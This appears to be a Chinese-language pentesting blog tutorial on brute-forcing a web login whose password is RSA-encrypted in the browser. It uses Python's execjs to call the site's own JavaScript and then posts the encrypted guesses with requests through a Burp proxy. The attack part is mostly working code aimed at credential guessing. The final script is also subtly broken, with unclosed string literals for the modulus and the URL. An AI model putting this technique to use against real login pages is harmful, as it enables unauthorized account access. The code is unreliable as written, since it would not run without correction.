在WEB渗透时,需要对数据进行枚举爆破时,由于数据进行变化加密,导致无法借助代理工具快速的发送符合要求的数据包。可利用python的execjs模块,直接调用JS文件,生成变化后的数据。

1、一般数据处理

在碰到较简单的数据处理时,如md5,base64等,可直接利用Burp Suite中Intruder模块进行数据处理。

BURP

2、execjs执行js

安装execjs,python -m pip install PyExecJS

1
2
3
4
5
6
import execjs
encryp = open('encrypt.gzjs', 'r').read()
bigint = open('BigInt.gzjs', 'r').read()
barrett = open('Barrett.gzjs', 'r').read()
parser = execjs.compile(encryp+bigint+barrett)

可直接调用js里的函数了

1
data = parser.call('encrypto', module, 'test')

3、账号暴力破解

在进行某网站用户名密码暴力破解测试的时候,发现其密码被加密。

1
userName=test&language=1&actionType=umlogin&userIpMac=&authorization=0d6745d0035718d640bc6a3d363a3221e44f9101255e1bb286a3bccb489481fbdf01b36fd45e737c1cf866cf0687fd33f666148395d265aaf78f05a3ccf27135&redirectUrl=

通过查看源代码发现其使用RSA加密

1
<script type="text/javascript" src="RSA-min.js"></script>

依次调用了RSAKeyPair和encryptedString函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
<script language="JavaScript">
var form = document.forms[0];form.language.value = 1;
if(form.language.value == 0){
document.getElementById("changePwd").style.width = '120px';document.getElementById("login").style.width = '120px';document.getElementById("reset").style.width = '120px';}
function GetQueryString(name){
var reg = new RegExp("(^|&)"+ name +"=([^&]*)(&|$)");
var r = window.location.search.substr(1).match(reg);
if(r!=null)
return
unescape(r[2]);
return "";}
function input(key){
if(key == 13){
submitValue();}}
function select(obj){
form.actionType.value = "changeLanguage";
form.method = "get";form.action = "http://xxx"; form.submit();}
var key;var isLogin = 0;
function submitValue(){
if(isLogin == 1){return;}
document.getElementById("userLogining").style.display = "";
document.getElementById("userLogining").innerHTML = "正在登陆中,请稍候......";
setMaxDigits(130);
key = new RSAKeyPair("010001", "", "e464da7f77fe86d25e80917f56146148c78b53bfed06abd619f595cfc4e502aa03f74c208644c2c3c137caaed9a3721f53af1a9b79f54913b8a356a2e294a22b");
var pwd = form.password.value;form.actionType.value = "umlogin";
form.authorization.value = encryptedString(key, pwd);
form.redirectUrl.value = GetQueryString("redirect");
form.action = "http://xxx";isLogin = 1;
form.submit();}
function resetValue(){
form.username.value ="";form.password.value ="";}
function changePassword(){
form.actionType.value="umModifyPwPage";form.submit();}
</script>

我们可以直接在RSA-min.js中添加个函数完成中间过程,我们只需取得最后结果

1
2
3
function encrypto(encryptionExponent,decryptionExponent,modulus, data){
setMaxDigits(130);return encryptedString(new RSAKeyPair(encryptionExponent,decryptionExponent,modulus),data);
}

最后源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
import execjs
import requests
rsa_js = open('RSA-min.js', 'r').read()
parser = execjs.compile(rsa_js)
header = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'}
session = requests.Session()
rsa_data = parser.call('encrypto', '10001', '', e464da7f77fe86d25e80917f56146148c78b53bfed06abd619f595cfc4e502aa03f74c208644c2c3c137caaed9a3721f53af1a9b79f54913b8a356a2e294a22b', password)
data = {'userName' :'test', 'authorization': rsa_data}
rep = session.post('http://xxx/, data=data, headers=header, proxies={'http': '127.0.0.1:8080'})
print rep.content